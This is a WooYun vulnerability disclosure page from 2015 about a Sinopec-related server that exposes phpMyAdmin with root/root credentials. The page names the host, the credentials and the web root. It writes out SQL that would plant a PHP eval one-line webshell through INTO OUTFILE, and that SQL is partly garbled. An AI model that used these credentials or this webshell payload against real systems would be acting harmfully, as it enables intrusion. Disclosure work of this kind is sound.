当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166000

漏洞标题:中石化某站敏感信息泄漏(数据库外连+可getshell)

相关厂商:中国石油化工股份有限公司

漏洞作者: 牛 小 帅

提交时间:2015-12-30 12:29

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

中石化某站敏感信息泄漏(数据库外连+可getshell)

详细说明:

http://mail.scdc.com.cn:3000


用户:root
密码:root
连接后是phpmyamdin
大量用户吧,admin我都解密了,但是登入地址没找着

OM{87MH8SPQ(_O7RX(63YEJ.png


Q_W0C(`{6U`}G~2)5_~OAD6.png


来看根目录

LS%IMUJFBWR1F%LK}(MMNNJ.png


==============================================================
我理想getshell类型,因为第一次接触这种实际环境,不敢贸然执行,下面是我想执行的
根目录是:D:/phpStudy/WWW
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'D:/phpStudy/WWW /7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到D:/phpStudy/WWW/7.php
一句话连接密码:xiaoma
=========================================

漏洞证明:

修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-30 14:20

厂商回复:

谢谢!我们会尽快处理。

最新状态:

暂无